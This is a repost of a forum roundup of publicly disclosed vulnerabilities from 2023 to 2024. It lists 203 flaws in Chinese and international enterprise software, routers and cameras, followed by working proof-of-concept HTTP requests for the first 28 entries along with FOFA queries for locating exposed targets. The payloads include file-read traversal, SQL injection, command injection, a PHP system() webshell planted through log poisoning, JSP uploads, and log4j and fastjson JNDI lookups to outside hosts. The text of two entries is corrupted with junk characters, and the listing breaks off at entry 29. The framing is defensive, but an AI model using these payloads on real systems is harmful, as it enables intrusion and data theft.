中国网络渗透测试联盟

Title: Roundup of publicly disclosed Internet vulnerabilities 202309-202406 -- repost

Author: admin    Time: 2024-6-5 14:31
Title: Roundup of publicly disclosed Internet vulnerabilities 202309-202406 -- repost
Roundup of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article is of some help to defenders. Defensive teams can use its contents as a checklist for risk assessment.

Sources: this article covers 203 PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all the vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: owing to length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; use F12 to search for keywords when consulting it.

Bookmark this article if you find it useful, and feel free to follow the official account (网络安全新视界).

Table of contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service washing machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the first-step login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used for the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the written function executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. l& F8 \/ u, }- ^' O& X6 pFOFA:icon_hash="-1935899595"
+ D: b4 G' ]" aPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1" F( v. u6 f( A4 @. g
Host: your-ip* G5 Y- B% p: I9 Y+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% x2 ?) w+ ?* {0 Y# t; X
Content-Type: application/json;charset=utf-8/ g7 a$ {3 d  s9 h+ u

1 l- u: [: f! |5 C- N{
  x- j" @7 o0 t8 s% A1 Q5 r- S"loginName":"${jndi:ldap://dnslog}"
+ G6 N- l: D7 m/ Y7 h! _" ]}! {4 S7 M: u7 c# N: q$ O
9 j: N- e7 u2 j0 u

2 ?$ P7 `) `: P" Z' e
6 g3 C4 O- v1 G- X1 F4 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! t2 {' a9 m$ D
FOFA:icon_hash="-1935899595"% \5 B; q" C2 A* z# @0 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 Y  n) r! k2 X/ H2 W- W5 {
Host: your-ip* V7 V$ }. T; i+ R7 B# a8 \3 j7 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 J/ c' x+ _* wContent-Type: application/json;charset=utf-8; o4 b, }( M* K0 v' I
Accept-Encoding: gzip
: \) u) t2 O/ Z* e0 k: b9 k: p/ ~. }Connection: close' G8 N8 ?9 D: l6 ^, V3 H6 p
' f% k+ M& t- t6 a: y" ~" |
{
8 C5 J+ g- |) j0 ^    "a":{
  M( `; r. `" ^( S; k        "@type":"com.alibaba.fastjson.JSONObject",
$ p" T) Q' Y4 v) }9 F" K       {"@type":"java.net.URL","val":"http://DNSLOG"}
6 G+ p9 P+ f1 r: y+ |8 x        }""
* I) O8 O7 T( m3 o4 ?$ P3 g; |- W}: E4 K: s1 T0 _* Q

4 O5 A' f" P+ C! E# @+ @8 j4 S( s6 O* J1 X* J
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
